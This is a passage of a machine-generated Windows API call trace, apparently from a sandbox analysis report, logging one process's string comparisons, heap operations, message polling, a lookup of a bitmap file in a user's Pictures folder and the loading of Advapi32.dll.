lpString2="Fixed.", cchCount2=6) returned 3 [0255.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SkJL.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kJL.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JL.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.271] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0255.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0255.271] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0255.271] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0255.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0255.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0255.272] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0255.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0255.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0255.272] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0255.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0255.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0255.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0255.272] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0255.272] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.272] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0255.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.273] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0255.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.273] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.273] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.273] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/FWAReLHUsSkJL.bmp", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b88900, ftCreationTime.dwHighDateTime=0x1d4c9fc, ftLastAccessTime.dwLowDateTime=0x1460dbf0, ftLastAccessTime.dwHighDateTime=0x1d4c7e4, ftLastWriteTime.dwLowDateTime=0x1460dbf0, ftLastWriteTime.dwHighDateTime=0x1d4c7e4, nFileSizeHigh=0x0, nFileSizeLow=0xbacb, dwReserved0=0x9c80047, dwReserved1=0x1dbb2, cFileName="FWAReLHUsSkJL.bmp", cAlternateFileName="FWAREL~1.BMP")) returned 0xaa5760 [0255.273] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0255.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0255.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.274] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0255.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0255.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0255.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0255.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.276] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.276] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0255.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0255.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0255.276] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0255.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.277] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0255.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0255.277] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.277] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.277] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0255.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.278] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0255.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.278] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0255.279] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.279] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0255.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0255.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0255.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0255.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0255.280] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0255.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0255.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0255.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.281] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0255.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.282] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.282] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.282] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0255.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1728 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.283] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 